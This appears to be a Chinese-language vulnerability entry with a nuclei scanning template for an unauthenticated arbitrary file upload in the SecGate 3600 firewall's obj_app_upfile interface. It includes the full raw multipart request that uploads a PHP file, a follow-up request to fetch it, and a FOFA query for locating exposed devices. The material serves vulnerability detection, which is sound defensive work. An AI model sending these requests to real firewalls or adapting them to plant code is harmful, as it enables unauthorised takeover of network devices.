网神SecGate 3600防火墙任意文件上传漏洞

描述

网神 SecGate 3600 防火墙  obj_app_upfile 接口存在任意文件上传漏洞，未经授权的攻击者通过漏洞可以上传任意文件，获取服务器权限。

nuclei 模板

id: Netnifty-SecGate-3600-Firewal-fileuploads
info:
  name: 网神SecGate 3600防火墙任意文件上传
  severity: high
  description: |
     网神 SecGate 3600 防火墙  obj_app_upfile 接口存在任意文件上传漏洞，未经授权的攻击者通过漏洞可以上传任意文件，获取服务器权限。
  remediation:
        关闭互联网暴露面，文件上传模块设置权限强认证。
  metadata:
    verified: true
    fofa-query: title="网神SecGate 3600防火墙"
  tags: fileupload,SecGate,3600,firewallindex
variables:
     r1: "{{rand_int(800000000, 1000000000)}}"
     r2: "{{rand_int(800000000, 1000000000)}}"
requests:
  - raw:
      - |
        POST /?g=obj_app_upfile HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
        Connection: close
        Content-Length: 428
        Accept: */*
        Accept-Encoding: gzip, deflate, br
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
        Cookie: __s_sessionid__=1;

        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="certfile";filename="{{r1}}.php"
        Content-Type: text/plain

        {{r2}}
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="submit_post"

        sec_web_auth_custom_setting_confsave
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="certfile_r"

        file
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc--  


      - |
        GET /attachements/{{r1}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{r2}}"
          
      - type: status
        status:
          - 200